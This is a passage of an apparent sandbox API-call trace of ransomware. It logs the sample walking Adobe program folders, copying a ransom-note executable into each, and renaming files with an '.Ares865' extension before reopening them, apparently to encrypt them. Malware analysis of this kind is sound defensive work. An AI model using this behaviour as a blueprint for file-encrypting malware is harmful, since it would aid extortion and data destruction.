hHeap=0x2b0000) returned 1 [0152.416] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned 55 [0152.416] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" [0152.416] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.416] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.417] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.417] GetLastError () returned 0x0 [0152.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.417] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.417] CloseHandle (hObject=0x120) returned 1 [0152.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.417] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.417] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.418] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.418] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.418] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.418] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.418] lstrlenW (lpString="Ares865") returned 7 [0152.418] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.418] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.420] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0152.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.427] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" [0152.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0152.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7928 | out: hHeap=0x2b0000) returned 1 [0152.427] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned 55 [0152.427] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" [0152.427] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.427] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.428] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.428] GetLastError () returned 0x0 [0152.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.428] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.429] CloseHandle (hObject=0x120) returned 1 [0152.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.429] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.429] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.429] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.429] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.429] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.429] lstrlenW (lpString="Ares865") returned 7 [0152.429] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.429] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" [0152.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0152.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7908 | out: hHeap=0x2b0000) returned 1 [0152.437] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned 45 [0152.437] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" [0152.437] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.437] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.438] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.438] GetLastError () returned 0x0 [0152.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.438] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.438] CloseHandle (hObject=0x120) returned 1 [0152.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.438] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.438] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.439] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.439] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.439] lstrcpyW (in: lpString1=0x2cce45c, lpString2="1.0" | out: lpString1="1.0") returned="1.0" [0152.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0152.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d2f60 [0152.439] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0152.439] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a8cda0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0152.439] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0152.439] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a8cda0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0152.439] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0152.439] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7910 [0152.439] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" [0152.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f60 | out: hHeap=0x2b0000) returned 1 [0152.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7908 | out: hHeap=0x2b0000) returned 1 [0152.439] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned 49 [0152.439] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" [0152.439] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.439] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.440] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.441] GetLastError () returned 0x0 [0152.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.441] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.441] CloseHandle (hObject=0x120) returned 1 [0152.441] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.441] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.441] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.441] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.441] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.441] lstrcpyW (in: lpString1=0x2cce464, lpString2="AcrobatUpdater.exe" | out: lpString1="AcrobatUpdater.exe") returned="AcrobatUpdater.exe" [0152.441] lstrlenW (lpString="AcrobatUpdater.exe") returned 18 [0152.441] lstrlenW (lpString="Ares865") returned 7 [0152.441] lstrcmpiW (lpString1="ter.exe", lpString2="Ares865") returned 1 [0152.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.Ares865") returned 76 [0152.442] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe.ares865"), dwFlags=0x1) returned 1 [0152.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AcrobatUpdater.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\acrobatupdater.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.444] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338856) returned 1 [0152.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.472] lstrcpyW (in: lpString1=0x2cce464, lpString2="AdobeARM.exe" | out: lpString1="AdobeARM.exe") returned="AdobeARM.exe" [0152.472] lstrlenW (lpString="AdobeARM.exe") returned 12 [0152.472] lstrlenW (lpString="Ares865") returned 7 [0152.472] lstrcmpiW (lpString1="ARM.exe", lpString2="Ares865") returned 1 [0152.472] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.Ares865") returned 70 [0152.472] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe.ares865"), dwFlags=0x1) returned 1 [0152.474] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.475] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=932288) returned 1 [0152.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.551] lstrcpyW (in: lpString1=0x2cce464, lpString2="AdobeExtractFiles.dll" | out: lpString1="AdobeExtractFiles.dll") returned="AdobeExtractFiles.dll" [0152.551] lstrlenW (lpString="AdobeExtractFiles.dll") returned 21 [0152.551] lstrlenW (lpString="Ares865") returned 7 [0152.551] lstrcmpiW (lpString1="les.dll", lpString2="Ares865") returned 1 [0152.551] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.Ares865") returned 79 [0152.551] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll.ares865"), dwFlags=0x1) returned 1 [0152.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeExtractFiles.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobeextractfiles.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.557] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70584) returned 1 [0152.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.568] lstrcpyW (in: lpString1=0x2cce464, lpString2="ReaderUpdater.exe" | out: lpString1="ReaderUpdater.exe") returned="ReaderUpdater.exe" [0152.568] lstrlenW (lpString="ReaderUpdater.exe") returned 17 [0152.568] lstrlenW (lpString="Ares865") returned 7 [0152.568] lstrcmpiW (lpString1="ter.exe", lpString2="Ares865") returned 1 [0152.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.Ares865") returned 75 [0152.568] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe.ares865"), dwFlags=0x1) returned 1 [0152.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\ReaderUpdater.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\readerupdater.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338856) returned 1 [0152.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" [0152.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0152.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e78e8 | out: hHeap=0x2b0000) returned 1 [0152.641] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned 49 [0152.641] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" [0152.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 